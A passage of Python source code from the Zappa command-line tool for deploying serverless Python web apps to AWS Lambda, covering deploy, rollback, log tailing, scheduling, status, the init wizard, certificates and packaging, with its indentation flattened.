endpoint_url = self.deploy_api_gateway(api_id)
if self.stage_config.get('domain', None):
endpoint_url = self.stage_config.get('domain')
else:
endpoint_url = None
self.schedule()
self.callback('post')
if endpoint_url and 'https://' not in endpoint_url:
endpoint_url = 'https://' + endpoint_url
deployed_string = "Your updated Zappa deployment is " + click.style("live", fg='green', bold=True) + "!"
if self.use_apigateway:
deployed_string = deployed_string + ": " + click.style("{}".format(endpoint_url), bold=True)
api_url = None
if endpoint_url and 'amazonaws.com' not in endpoint_url:
api_url = self.zappa.get_api_url(
self.lambda_name,
self.api_stage)
if endpoint_url != api_url:
deployed_string = deployed_string + " (" + api_url + ")"
if self.stage_config.get('touch', True):
if api_url:
requests.get(api_url)
elif endpoint_url:
requests.get(endpoint_url)
click.echo(deployed_string)
def rollback(self, revision):
"""
        Rolls back the currently deployed Lambda code to a previous revision.
"""
print("Rolling back..")
self.zappa.rollback_lambda_function_version(
self.lambda_name, versions_back=revision)
print("Done!")
def tail(self, since, filter_pattern, limit=10000, keep_open=True, colorize=True, http=False, non_http=False):
"""
Tail this function's logs.
if keep_open, do so repeatedly, printing any new logs
"""
try:
from util import string_to_timestamp
since_stamp = string_to_timestamp(since)
last_since = since_stamp
while True:
new_logs = self.zappa.fetch_logs(
self.lambda_name,
start_time=since_stamp,
limit=limit,
filter_pattern=filter_pattern,
)
new_logs = [ e for e in new_logs if e['timestamp'] > last_since ]
self.print_logs(new_logs, colorize, http, non_http)
if not keep_open:
break
if new_logs:
last_since = new_logs[-1]['timestamp']
time.sleep(1)
except KeyboardInterrupt: # pragma: no cover
# Die gracefully
try:
sys.exit(0)
except SystemExit:
os._exit(130)
def undeploy(self, noconfirm=False, remove_logs=False):
"""
        Tear down an existing deployment.
"""
if not noconfirm: # pragma: no cover
confirm = raw_input("Are you sure you want to undeploy? [y/n] ")
if confirm != 'y':
return
if self.use_apigateway:
if remove_logs:
self.zappa.remove_api_gateway_logs(self.lambda_name)
domain_name = self.stage_config.get('domain', None)
# Only remove the api key when not specified
if self.api_key_required and self.api_key is None:
api_id = self.zappa.get_api_id(self.lambda_name)
self.zappa.remove_api_key(api_id, self.api_stage)
gateway_id = self.zappa.undeploy_api_gateway(
self.lambda_name,
domain_name=domain_name
)
self.unschedule() # removes event triggers, including warm up event.
self.zappa.delete_lambda_function(self.lambda_name)
if remove_logs:
self.zappa.remove_lambda_function_logs(self.lambda_name)
click.echo(click.style("Done", fg="green", bold=True) + "!")
def schedule(self):
"""
        Given a list of functions and a schedule to execute them,
        set up regular execution.
"""
events = self.stage_config.get('events', [])
if events:
if not isinstance(events, list): # pragma: no cover
print("Events must be supplied as a list.")
return
for event in events:
self.collision_warning(event.get('function'))
if self.stage_config.get('keep_warm', True):
if not events:
events = []
keep_warm_rate = self.stage_config.get('keep_warm_expression', "rate(4 minutes)")
events.append({'name': 'zappa-keep-warm',
'function': 'handler.keep_warm_callback',
'expression': keep_warm_rate,
'description': 'Zappa Keep Warm - {}'.format(self.lambda_name)})
if self.stage_config.get('lets_encrypt_expression'):
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
conf = function_response['Configuration']
timeout = conf['Timeout']
if timeout < 60:
click.echo(click.style("Unable to schedule certificate autorenewer!", fg="red", bold=True) +
" Please redeploy with a " + click.style("timeout_seconds", bold=True) + " greater than 60!")
else:
events.append({'name': 'zappa-le-certify',
'function': 'handler.certify_callback',
'expression': self.stage_config.get('lets_encrypt_expression'),
'description': 'Zappa LE Certificate Renewer - {}'.format(self.lambda_name)})
if events:
try:
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
except botocore.exceptions.ClientError as e: # pragma: no cover
click.echo(click.style("Function does not exist", fg="yellow") + ", please " +
click.style("deploy", bold=True) + "first. Ex:" +
click.style("zappa deploy {}.".format(self.api_stage), bold=True))
sys.exit(-1)
print("Scheduling..")
self.zappa.schedule_events(
lambda_arn=function_response['Configuration']['FunctionArn'],
lambda_name=self.lambda_name,
events=events
)
def unschedule(self):
"""
        Given a list of scheduled functions,
tear down their regular execution.
"""
# Run even if events are not defined to remove previously existing ones (thus default to []).
events = self.stage_config.get('events', [])
if not isinstance(events, list): # pragma: no cover
print("Events must be supplied as a list.")
return
function_arn = None
try:
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
function_arn = function_response['Configuration']['FunctionArn']
except botocore.exceptions.ClientError as e: # pragma: no cover
raise ClickException("Function does not exist, you should deploy first. Ex: zappa deploy {}. "
"Proceeding to unschedule CloudWatch based events.".format(self.api_stage))
print("Unscheduling..")
self.zappa.unschedule_events(
lambda_name=self.lambda_name,
lambda_arn=function_arn,
events=events,
)
def invoke(self, function_name, raw_python=False, command=None):
"""
Invoke a remote function.
"""
# There are three likely scenarios for 'command' here:
# command, which is a modular function path
# raw_command, which is a string of python to execute directly
# manage, which is a Django-specific management command invocation
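        # For illustration, hypothetical calls and the payloads they produce:
        #   invoke('my_app.my_function')                -> {'command': 'my_app.my_function'}
        #   invoke('print("hi")', raw_python=True)      -> {'raw_command': 'print("hi")'}
        #   invoke('showmigrations', command='manage')  -> {'manage': 'showmigrations'}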
key = command if command is not None else 'command'
if raw_python:
command = {'raw_command': function_name}
else:
command = {key: function_name}
# Can't use hjson
import json as json
response = self.zappa.invoke_lambda_function(
self.lambda_name,
json.dumps(command),
invocation_type='RequestResponse',
)
if 'LogResult' in response:
print(base64.b64decode(response['LogResult']))
else:
print(response)
def status(self, return_json=False):
"""
Describe the status of the current deployment.
"""
def tabular_print(title, value):
"""
            Convenience function for printing formatted table items.
"""
click.echo('%-*s%s' % (32, click.style("\t" + title, fg='green') + ':', str(value)))
return
# Lambda Env Details
lambda_versions = self.zappa.get_lambda_function_versions(self.lambda_name)
if not lambda_versions:
raise ClickException(click.style("No Lambda %s detected in %s - have you deployed yet?" %
(self.lambda_name, self.zappa.aws_region), fg='red'))
status_dict = collections.OrderedDict()
status_dict["Lambda Versions"] = len(lambda_versions)
function_response = self.zappa.lambda_client.get_function(FunctionName=self.lambda_name)
conf = function_response['Configuration']
self.lambda_arn = conf['FunctionArn']
status_dict["Lambda Name"] = self.lambda_name
status_dict["Lambda ARN"] = self.lambda_arn
status_dict["Lambda Role ARN"] = conf['Role']
status_dict["Lambda Handler"] = conf['Handler']
status_dict["Lambda Code Size"] = conf['CodeSize']
status_dict["Lambda Version"] = conf['Version']
status_dict["Lambda Last Modified"] = conf['LastModified']
status_dict["Lambda Memory Size"] = conf['MemorySize']
status_dict["Lambda Timeout"] = conf['Timeout']
status_dict["Lambda Runtime"] = conf['Runtime']
if 'VpcConfig' in conf.keys():
status_dict["Lambda VPC ID"] = conf.get('VpcConfig', {}).get('VpcId', 'Not assigned')
else:
status_dict["Lambda VPC ID"] = None
# Calculated statistics
try:
function_invocations = self.zappa.cloudwatch.get_metric_statistics(
Namespace='AWS/Lambda',
MetricName='Invocations',
StartTime=datetime.utcnow()-timedelta(days=1),
EndTime=datetime.utcnow(),
Period=1440,
Statistics=['Sum'],
Dimensions=[{'Name': 'FunctionName',
'Value': '{}'.format(self.lambda_name)}]
)['Datapoints'][0]['Sum']
except Exception as e:
function_invocations = 0
try:
function_errors = self.zappa.cloudwatch.get_metric_statistics(
Namespace='AWS/Lambda',
MetricName='Errors',
StartTime=datetime.utcnow()-timedelta(days=1),
EndTime=datetime.utcnow(),
Period=1440,
Statistics=['Sum'],
Dimensions=[{'Name': 'FunctionName',
'Value': '{}'.format(self.lambda_name)}]
)['Datapoints'][0]['Sum']
except Exception as e:
function_errors = 0
try:
error_rate = "{0:.2f}%".format(function_errors / function_invocations * 100)
except:
error_rate = "Error calculating"
status_dict["Invocations (24h)"] = int(function_invocations)
status_dict["Errors (24h)"] = int(function_errors)
status_dict["Error Rate (24h)"] = error_rate
# URLs
if self.use_apigateway:
api_url = self.zappa.get_api_url(
self.lambda_name,
self.api_stage)
status_dict["API Gateway URL"] = api_url
# Api Keys
api_id = self.zappa.get_api_id(self.lambda_name)
for api_key in self.zappa.get_api_keys(api_id, self.api_stage):
status_dict["API Gateway x-api-key"] = api_key
# There literally isn't a better way to do this.
        # AWS provides no way to tie an APIGW domain name to its Lambda function.
domain_url = self.stage_config.get('domain', None)
if domain_url:
status_dict["Domain URL"] = 'https://' + domain_url
else:
status_dict["Domain URL"] = "None Supplied"
# Scheduled Events
event_rules = self.zappa.get_event_rules_for_lambda(lambda_arn=self.lambda_arn)
status_dict["Num. Event Rules"] = len(event_rules)
if len(event_rules) > 0:
status_dict['Events'] = []
for rule in event_rules:
event_dict = {}
rule_name = rule['Name']
event_dict["Event Rule Name"] = rule_name
event_dict["Event Rule Schedule"] = rule.get(u'ScheduleExpression', None)
event_dict["Event Rule State"] = rule.get(u'State', None).title()
event_dict["Event Rule ARN"] = rule.get(u'Arn', None)
status_dict['Events'].append(event_dict)
if return_json:
# Putting the status in machine readable format
# https://github.com/Miserlou/Zappa/issues/407
print(json.dumpsJSON(status_dict))
else:
click.echo("Status for " + click.style(self.lambda_name, bold=True) + ": ")
for k, v in status_dict.items():
if k == 'Events':
# Events are a list of dicts
for event in v:
for item_k, item_v in event.items():
tabular_print(item_k, item_v)
else:
tabular_print(k, v)
# TODO: S3/SQS/etc. type events?
return True
def check_stage_name(self, stage_name):
"""
Make sure the stage name matches the AWS-allowed pattern
(calls to apigateway_client.create_deployment, will fail with error
message "ClientError: An error occurred (BadRequestException) when
calling the CreateDeployment operation: Stage name only allows
a-zA-Z0-9_" if the pattern does not match)
"""
if self.stage_name_env_pattern.match(stage_name):
return True
raise ValueError("AWS requires stage name to match a-zA-Z0-9_")
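    # For illustration: check_stage_name("dev") passes, while
    # check_stage_name("my-stage") raises ValueError because '-' is outside
    # the allowed a-zA-Z0-9_ character set.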
def check_environment(self, environment):
"""
Make sure the environment contains only strings
(since putenv needs a string)
"""
non_strings = []
for k,v in environment.iteritems():
if not isinstance(v, basestring):
non_strings.append(k)
if non_strings:
raise ValueError("The following environment variables are not strings: {}".format(", ".join(non_strings)))
else:
return True
def init(self, settings_file="zappa_settings.json"):
"""
Initialize a new Zappa project by creating a new zappa_settings.json in a guided process.
        This should probably be broken up into a few separate components once it's stable.
Testing these raw_inputs requires monkeypatching with mock, which isn't pretty.
"""
# Ensure that we don't already have a zappa_settings file.
if os.path.isfile(settings_file):
raise ClickException("This project is " + click.style("already initialized", fg="red", bold=True) + "!")
# Ensure P2 until Lambda supports it.
if sys.version_info >= (3,0): # pragma: no cover
raise ClickException("Zappa curently only works with Python 2, until AWS Lambda adds Python 3 support.")
# Ensure inside virtualenv.
        if not (hasattr(sys, 'real_prefix') or hasattr(sys, 'base_prefix')): # pragma: no cover
raise ClickException(
"Zappa must be run inside of a virtual environment!\n"
"Learn more about virtual environments here: http://docs.python-guide.org/en/latest/dev/virtualenvs/")
# Explain system.
click.echo(click.style(u"""\n███████╗ █████╗ ██████╗ ██████╗ █████╗
╚══███╔╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗
███╔╝ ███████║██████╔╝██████╔╝███████║
███╔╝ ██╔══██║██╔═══╝ ██╔═══╝ ██╔══██║
███████╗██║ ██║██║ ██║ ██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝\n""", fg='green', bold=True))
click.echo(click.style("Welcome to ", bold=True) + click.style("Zappa", fg='green', bold=True) + click.style("!\n", bold=True))
click.echo(click.style("Zappa", bold=True) + " is a system for running server-less Python web applications"
" on AWS Lambda and AWS API Gateway.")
click.echo("This `init` command will help you create and configure your new Zappa deployment.")
click.echo("Let's get started!\n")
# Create Env
while True:
click.echo("Your Zappa configuration can support multiple production environments, like '" +
click.style("dev", bold=True) + "', '" + click.style("staging", bold=True) + "', and '" +
click.style("production", bold=True) + "'.")
env = raw_input("What do you want to call this environment (default 'dev'): ") or "dev"
try:
self.check_stage_name(env)
break
except ValueError:
click.echo(click.style("Environment names must match a-zA-Z0-9_", fg='red'))
# Create Bucket
click.echo("\nYour Zappa deployments will need to be uploaded to a " + click.style("private S3 bucket", bold=True) + ".")
click.echo("If you don't have a bucket yet, we'll create one for you too.")
default_bucket = "zappa-" + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(9))
bucket = raw_input("What do you want call your bucket? (default '%s'): " % default_bucket) or default_bucket
# TODO actually create bucket.
# Detect Django/Flask
try: # pragma: no cover
import django
has_django = True
except ImportError as e:
has_django = False
try: # pragma: no cover
import flask
has_flask = True
except ImportError as e:
has_flask = False
print('')
# App-specific
if has_django: # pragma: no cover
click.echo("It looks like this is a " + click.style("Django", bold=True) + " application!")
click.echo("What is the " + click.style("module path", bold=True) + " to your projects's Django settings?")
django_settings = None
matches = detect_django_settings()
while django_settings in [None, '']:
if matches:
click.echo("We discovered: " + click.style(', '.join('{}'.format(i) for v, i in enumerate(matches)), bold=True))
django_settings = raw_input("Where are your project's settings? (default '%s'): " % matches[0]) or matches[0]
else:
click.echo("(This will likely be something like 'your_project.settings')")
django_settings = raw_input("Where are your project's settings?: ")
django_settings = django_settings.replace("'", "")
django_settings = django_settings.replace('"', "")
else:
matches = None
if has_flask:
click.echo("It looks like this is a " + click.style("Flask", bold=True) + " application.")
matches = detect_flask_apps()
click.echo("What's the " + click.style("modular path", bold=True) + " to your app's function?")
click.echo("This will likely be something like 'your_module.app'.")
app_function = None
while app_function in [None, '']:
if matches:
click.echo("We discovered: " + click.style(', '.join('{}'.format(i) for v, i in enumerate(matches)), bold=True))
app_function = raw_input("Where is your app's function? (default '%s'): " % matches[0]) or matches[0]
else:
app_function = raw_input("Where is your app's function?: ")
app_function = app_function.replace("'", "")
app_function = app_function.replace('"', "")
# TODO: Create VPC?
# Memory size? Time limit?
# Domain? LE keys? Region?
# 'Advanced Settings' mode?
# Globalize
click.echo("\nYou can optionally deploy to " + click.style("all available regions", bold=True) + " in order to provide fast global service.")
click.echo("If you are using Zappa for the first time, you probably don't want to do this!")
global_deployment = False
while True:
global_type = raw_input("Would you like to deploy this application to " + click.style("globally", bold=True) + "? (default 'n') [y/n/(p)rimary]: ")
if not global_type:
break
if global_type.lower() in ["y", "yes", "p", "primary"]:
global_deployment = True
break
if global_type.lower() in ["n", "no"]:
global_deployment = False
break
if global_deployment:
regions = API_GATEWAY_REGIONS
if global_type.lower() in ["p", "primary"]:
envs = [{env + '_' + region.replace('-', '_'): { 'aws_region': region}} for region in regions if '-1' in region]
else:
envs = [{env + '_' + region.replace('-', '_'): { 'aws_region': region}} for region in regions]
else:
region = None # assume system default
envs = [{env: {}}]
zappa_settings = {}
for each_env in envs:
# Honestly, this could be cleaner.
env_name = each_env.keys()[0]
env_dict = each_env[env_name]
env_bucket = bucket
if global_deployment:
env_bucket = bucket.replace('-', '_') + '_' + env_name
env_zappa_settings = {
env_name: {
's3_bucket': env_bucket,
}
}
if 'aws_region' in env_dict:
env_zappa_settings[env_name]['aws_region'] = env_dict.get('aws_region')
zappa_settings.update(env_zappa_settings)
if has_django:
zappa_settings[env_name]['django_settings'] = django_settings
else:
zappa_settings[env_name]['app_function'] = app_function
import json  # hjson is fine for loading, not fine for writing.
zappa_settings_json = json.dumps(zappa_settings, sort_keys=True, indent=4)
click.echo("\nOkay, here's your " + click.style("zappa_settings.js", bold=True) + ":\n")
click.echo(click.style(zappa_settings_json, fg="yellow", bold=False))
confirm = raw_input("\nDoes this look " + click.style("okay", bold=True, fg="green") + "? (default 'y') [y/n]: ") or 'yes'
if confirm[0] not in ['y', 'Y', 'yes', 'YES']:
click.echo("" + click.style("Sorry", bold=True, fg='red') + " to hear that! Please init again.")
return
# Write
with open("zappa_settings.json", "w") as zappa_settings_file:
zappa_settings_file.write(zappa_settings_json)
if global_deployment:
click.echo("\n" + click.style("Done", bold=True) + "! You can also " + click.style("deploy all", bold=True) + " by executing:\n")
click.echo(click.style("\t$ zappa deploy --all", bold=True))
click.echo("\nAfter that, you can " + click.style("update", bold=True) + " your application code with:\n")
click.echo(click.style("\t$ zappa update --all", bold=True))
else:
click.echo("\n" + click.style("Done", bold=True) + "! Now you can " + click.style("deploy", bold=True) + " your Zappa application by executing:\n")
click.echo(click.style("\t$ zappa deploy %s" % env, bold=True))
click.echo("\nAfter that, you can " + click.style("update", bold=True) + " your application code with:\n")
click.echo(click.style("\t$ zappa update %s" % env, bold=True))
click.echo("\nTo learn more, check out our project page on " + click.style("GitHub", bold=True) +
" here: " + click.style("https://github.com/Miserlou/Zappa", fg="cyan", bold=True))
click.echo("and stop by our " + click.style("Slack", bold=True) + " channel here: " +
click.style("http://bit.do/zappa", fg="cyan", bold=True))
click.echo("\nEnjoy!,")
click.echo(" ~ Team " + click.style("Zappa", bold=True) + "!")
return
def certify(self, no_cleanup=False):
"""
Register or update a domain certificate for this env.
"""
# Give warning on --no-cleanup
if no_cleanup:
clean_up = False
click.echo(click.style("Warning!", fg="red", bold=True) + " You are calling certify with " +
click.style("--no-cleanup", bold=True) +
". Your certificate files will remain in the system temporary directory after this command executes!")
else:
clean_up = True
# Make sure this isn't already deployed.
deployed_versions = self.zappa.get_lambda_function_versions(self.lambda_name)
if len(deployed_versions) == 0:
raise ClickException("This application " + click.style("isn't deployed yet", fg="red") +
" - did you mean to call " + click.style("deploy", bold=True) + "?")
# Get install account_key to /tmp/account_key.pem
account_key_location = self.stage_config.get('lets_encrypt_key')
domain = self.stage_config.get('domain')
cert_location = self.stage_config.get('certificate', None)
cert_key_location = self.stage_config.get('certificate_key', None)
cert_chain_location = self.stage_config.get('certificate_chain', None)
if not domain:
raise ClickException("Can't certify a domain without " + click.style("domain", fg="red", bold=True) + " configured!")
if not cert_location:
if not account_key_location:
raise ClickException("Can't certify a domain without " + click.style("lets_encrypt_key", fg="red", bold=True) + " configured!")
if account_key_location.startswith('s3://'):
bucket, key_name = parse_s3_url(account_key_location)
self.zappa.s3_client.download_file(bucket, key_name, '/tmp/account.key')
else:
from shutil import copyfile
copyfile(account_key_location, '/tmp/account.key')
else:
if not cert_location or not cert_key_location or not cert_chain_location:
raise ClickException("Can't certify a domain without " +
click.style("certificate, certificate_key and certificate_chain", fg="red", bold=True) + " configured!")
# Read the supplied certificates.
with open(cert_location) as f:
certificate_body = f.read()
with open(cert_key_location) as f:
certificate_private_key = f.read()
with open(cert_chain_location) as f:
certificate_chain = f.read()
click.echo("Certifying domain " + click.style(domain, fg="green", bold=True) + "..")
# Get cert and update domain.
if not cert_location:
from letsencrypt import get_cert_and_update_domain, cleanup
cert_success = get_cert_and_update_domain(
self.zappa,
self.lambda_name,
self.api_stage,
domain,
clean_up
)
else:
if not self.zappa.get_domain_name(domain):
self.zappa.create_domain_name(
domain,
domain + "-Zappa-Cert",
certificate_body,
certificate_private_key,
certificate_chain,
self.lambda_name,
self.api_stage
)
print("Created a new domain name. Please note that it can take up to 40 minutes for this domain to be "
"created and propagated through AWS, but it requires no further work on your part.")
else:
self.zappa.update_domain_name(
domain,
domain + "-Zappa-Cert",
certificate_body,
certificate_private_key,
certificate_chain
)
cert_success = True
# Deliberately undocumented feature (for now, at least.)
# We are giving the user the ability to shoot themselves in the foot.
# _This is probably not a good idea._
# However, I am sick and tired of hitting the Let's Encrypt cert
# limit while testing.
if clean_up:
    # `cleanup` is only imported in the Let's Encrypt branch above; import it
    # here as well so the user-supplied-certificate path does not NameError.
    from letsencrypt import cleanup
    cleanup()
if cert_success:
click.echo("Certificate " + click.style("updated", fg="green", bold=True) + "!")
else:
click.echo(click.style("Failed", fg="red", bold=True) + " to generate or install certificate! :(")
click.echo("\n==============\n")
shamelessly_promote()
##
# Utility
##
def callback(self, position):
"""
Allows the execution of custom code between creation of the zip file and deployment to AWS.
:return: None
"""
callbacks = self.stage_config.get('callbacks', {})
callback = callbacks.get(position)
if callback:
(mod_path, cb_func_name) = callback.rsplit('.', 1)
try: # Prefer callback in working directory
if mod_path.count('.') >= 1: # Callback function is nested in a folder
(mod_folder_path, mod_name) = mod_path.rsplit('.', 1)
mod_folder_path_fragments = mod_folder_path.split('.')
working_dir = os.path.join(os.getcwd(), *mod_folder_path_fragments)
else:
mod_name = mod_path
working_dir = os.getcwd()
working_dir_importer = pkgutil.get_importer(working_dir)
module_ = working_dir_importer.find_module(mod_name).load_module(mod_name)
except (ImportError, AttributeError):
try: # Callback func might be in virtualenv
module_ = importlib.import_module(mod_path)
except ImportError: # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"import {position} callback ".format(position=position),
bold=True) + 'module: "{mod_path}"'.format(mod_path=click.style(mod_path, bold=True)))
if not hasattr(module_, cb_func_name): # pragma: no cover
raise ClickException(click.style("Failed ", fg="red") + 'to ' + click.style(
"find {position} callback ".format(position=position), bold=True) + 'function: "{cb_func_name}" '.format(
cb_func_name=click.style(cb_func_name, bold=True)) + 'in module "{mod_path}"'.format(mod_path=mod_path))
cb_func = getattr(module_, cb_func_name)
cb_func(self) # Call the function passing self
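    # A minimal sketch of the wiring above (the module, function and position
    # names are made up for illustration, not taken from this codebase):
    #   zappa_settings.json:  {"dev": {"callbacks": {"post": "my_hooks.on_post"}}}
    #   my_hooks.py:          def on_post(zappa_cli):
    #                             print(zappa_cli.lambda_name)
    # self.callback('post') would then import my_hooks and call on_post(self).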
def check_for_update(self):
"""
Print a warning if there's a new Zappa version available.
"""
try:
version = pkg_resources.require("zappa")[0].version
updateable = check_new_version_available(version)
if updateable:
click.echo(click.style("Important!", fg="yellow", bold=True) +
" A new version of " + click.style("Zappa", bold=True) + " is available!")
click.echo("Upgrade with: " + click.style("pip install zappa --upgrade", bold=True))
click.echo("Visit the project page on GitHub to see the latest changes: " +
click.style("https://github.com/Miserlou/Zappa", bold=True))
except Exception as e: # pragma: no cover
print(e)
return
def load_settings(self, settings_file=None, session=None):
"""
Load the local zappa_settings file.
An existing boto session can be supplied, though this is likely for testing purposes.
Returns the loaded Zappa object.
"""
# Ensure we're passed a valid settings file.
if not settings_file:
settings_file = self.get_json_or_yaml_settings()
if not os.path.isfile(settings_file):
raise ClickException("Please configure your zappa_settings file.")
# Load up file
self.load_settings_file(settings_file)
# Make sure that the environments are valid names:
for stage_name in self.zappa_settings.keys():
try:
self.check_stage_name(stage_name)
except ValueError:
raise ValueError("API stage names must match a-zA-Z0-9_ ; '{0!s}' does not.".format(stage_name))
# Make sure that this environment is our settings
if self.api_stage not in self.zappa_settings.keys():
raise ClickException("Please define '{0!s}' in your Zappa settings.".format(self.api_stage))
# We need a working title for this project. Use one if supplied, else cwd dirname.
if 'project_name' in self.stage_config: # pragma: no cover
self.project_name = self.stage_config['project_name']
else:
self.project_name = slugify.slugify(os.getcwd().split(os.sep)[-1])[:15]
if len(self.project_name) > 15: # pragma: no cover
click.echo(click.style("Warning", fg="red", bold=True) + "! Your " + click.style("project_name", bold=True) +
" may be too long to deploy! Please make it <16 characters.")
# The name of the actual AWS Lambda function, ex, 'helloworld-dev'
# Django's slugify doesn't replace _, but this does.
self.lambda_name = slugify.slugify(self.project_name + '-' + self.api_stage)
# Load environment-specific settings
self.s3_bucket_name = self.stage_config.get('s3_bucket', "zappa-" + ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(9)))
self.vpc_config = self.stage_config.get('vpc_config', {})
self.memory_size = self.stage_config.get('memory_size', 512)
self.app_function = self.stage_config.get('app_function', None)
self.exception_handler = self.stage_config.get('exception_handler', None)
self.aws_region = self.stage_config.get('aws_region', None)
self.debug = self.stage_config.get('debug', True)
self.prebuild_script = self.stage_config.get('prebuild_script', None)
self.profile_name = self.stage_config.get('profile_name', None)
self.log_level = self.stage_config.get('log_level', "DEBUG")
self.domain = self.stage_config.get('domain', None)
self.timeout_seconds = self.stage_config.get('timeout_seconds', 30)
# Provide legacy support for `use_apigateway`, now `apigateway_enabled`.
# https://github.com/Miserlou/Zappa/issues/490
# https://github.com/Miserlou/Zappa/issues/493
self.use_apigateway = self.stage_config.get('use_apigateway', True)
if self.use_apigateway:
self.use_apigateway = self.stage_config.get('apigateway_enabled', True)
self.integration_content_type_aliases = self.stage_config.get('integration_content_type_aliases', {})
self.lambda_handler = self.stage_config.get('lambda_handler', 'handler.lambda_handler')
# DEPRECATED. https://github.com/Miserlou/Zappa/issues/456
self.remote_env_bucket = self.stage_config.get('remote_env_bucket', None)
self.remote_env_file = self.stage_config.get('remote_env_file', None)
self.remote_env = self.stage_config.get('remote_env', None)
self.settings_file = self.stage_config.get('settings_file', None)
self.django_settings = self.stage_config.get('django_settings', None)
self.manage_roles = self.stage_config.get('manage_roles', True)
self.api_key_required = self.stage_config.get('api_key_required', False)
self.api_key = self.stage_config.get('api_key')
self.iam_authorization = self.stage_config.get('iam_authorization', False)
self.cors = self.stage_config.get("cors", None)
self.lambda_description = self.stage_config.get('lambda_description', "Zappa Deployment")
self.environment_variables = self.stage_config.get('environment_variables', {})
self.check_environment(self.environment_variables)
self.authorizer = self.stage_config.get('authorizer', {})
self.zappa = Zappa( boto_session=session,
profile_name=self.profile_name,
aws_region=self.aws_region,
load_credentials=self.load_credentials
)
for setting in CUSTOM_SETTINGS:
if setting in self.stage_config:
setting_val = self.stage_config[setting]
# Read the policy file contents.
if setting.endswith('policy'):
with open(setting_val, 'r') as f:
setting_val = f.read()
setattr(self.zappa, setting, setting_val)
if self.app_function:
self.collision_warning(self.app_function)
if self.app_function[-3:] == '.py':
click.echo(click.style("Warning!", fg="red", bold=True) +
" Your app_function is pointing to a " + click.style("file and not a function", bold=True) +
"! It should probably be something like 'my_file.app', not 'my_file.py'!")
return self.zappa
def get_json_or_yaml_settings(self, settings_name="zappa_settings"):
"""
Return zappa_settings path as JSON or YAML (or TOML), as appropriate.
"""
zs_json = settings_name + ".json"
zs_yaml = settings_name + ".yml"
zs_toml = settings_name + ".toml"
# Must have at least one
if not os.path.isfile(zs_json) \
and not os.path.isfile(zs_yaml) \
and not os.path.isfile(zs_toml):
raise ClickException("Please configure a zappa_settings file.")
# Prefer JSON
if os.path.isfile(zs_json):
settings_file = zs_json
elif os.path.isfile(zs_toml):
settings_file = zs_toml
else:
settings_file = zs_yaml
return settings_file
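    # Resolution sketch: if both zappa_settings.json and zappa_settings.yml
    # exist, the .json file wins; .toml is preferred over .yml; if none of
    # the three files exist, a ClickException is raised.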
def load_settings_file(self, settings_file=None):
"""
Load our settings file.
"""
if not settings_file:
settings_file = self.get_json_or_yaml_settings()
if not os.path.isfile(settings_file):
raise ClickException("Please configure your zappa_settings file.")
if '.yml' in settings_file:
with open(settings_file) as yaml_file:
try:
self.zappa_settings = yaml.load(yaml_file)
except ValueError: # pragma: no cover
raise ValueError("Unable to load the Zappa settings YAML. It may be malformed.")
elif '.toml' in settings_file:
with open(settings_file) as toml_file:
try:
self.zappa_settings = toml.load(toml_file)
except ValueError: # pragma: no cover
raise ValueError("Unable to load the Zappa settings TOML. It may be malformed.")
else:
with open(settings_file) as json_file:
try:
self.zappa_settings = json.load(json_file)
except ValueError: # pragma: no cover
raise ValueError("Unable to load the Zappa settings JSON. It may be malformed.")
def create_package(self):
"""
Ensure that the package can be properly configured,
and then create it.
"""
# Create the Lambda zip package (includes project and virtualenvironment)
# Also define the path the handler file so it can be copied to the zip
# root for Lambda.
current_file = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
handler_file = os.sep.join(current_file.split(os.sep)[0:]) + os.sep + 'handler.py'
# Create the zip file(s)
if self.stage_config.get('slim_handler', False):
# Create two zips. One with the application and the other with just the handler.
# https://github.com/Miserlou/Zappa/issues/510
self.zip_path = self.zappa.create_lambda_zip(
prefix=self.lambda_name,
use_precompiled_packages=self.stage_config.get('use_precompiled_packages', True),
exclude=self.stage_config.get('exclude', [])
)
# Make sure the normal venv is not included in the handler's zip
exclude = self.stage_config.get('exclude', [])
cur_venv = self.zappa.get_current_venv()
exclude.append(cur_venv.split('/')[-1])
self.handler_path = self.zappa.create_lambda_zip(
prefix='handler_{0!s}'.format(self.lambda_name),
venv=self.zappa.create_handler_venv(),
handler_file=handler_file,
slim_handler=True,
exclude=exclude
)
else:
# Create a single zip that has the handler and application
self.zip_path = self.zappa.create_lambda_zip(
prefix=self.lambda_name,
handler_file=handler_file,
use_precompiled_packages=self.stage_config.get('use_precompiled_packages', True),
exclude=self.stage_config.get(
'exclude',
# Exclude packages already builtin to the python lambda environment
# https://github.com/Miserlou/Zappa/issues/556
["boto3", "dateutil", "botocore", "s3transfer", "six.py", "jmespath", "concurrent"])
)
# Warn if this is too large for Lambda.
file_stats = os.stat(self.zip_path)
if file_stats.st_size > 52428800: # pragma: no cover
print('\n\nWarning: Application zip package is likely to be too large for AWS Lambda. '
'Try setting "slim_handler" to true in your Zappa settings file.\n\n')
# Throw custom settings into the zip that handles requests
if self.stage_config.get('slim_handler', False):
handler_zip = self.handler_path
else:
handler_zip = self.zip_path
with zipfile.ZipFile(handler_zip, 'a') as lambda_zip:
settings_s = "# Generated by Zappa\n"
if self.app_function:
if '.' not in self.app_function: # pragma: no cover
raise ClickException("Your " + click.style("app_function", fg='red', bold=True) + " value is not a modular path." +
" It needs to be in the format `" + click.style("your_module.your_app_object", bold=True) + "`.")
app_module, app_function = self.app_function.rsplit('.', 1)
settings_s = settings_s + "APP_MODULE='{0!s}'\nAPP_FUNCTION='{1!s}'\n".format(app_module, app_function)
if self.exception_handler:
settings_s += "EXCEPTION_HANDLER='{0!s}'\n".format(self.exception_handler)
else:
settings_s += "EXCEPTION_HANDLER=None\n"
if self.debug:
settings_s = settings_s + "DEBUG=True\n"
else:
settings_s = settings_s + "DEBUG=False\n"
settings_s = settings_s + "LOG_LEVEL='{0!s}'\n".format((self.log_level))
# If we're on a domain, we don't need to define the /<<env>> in
# the WSGI PATH
if self.domain:
settings_s = settings_s + "DOMAIN='{0!s}'\n".format((self.domain))
else:
settings_s = settings_s + "DOMAIN=None\n"
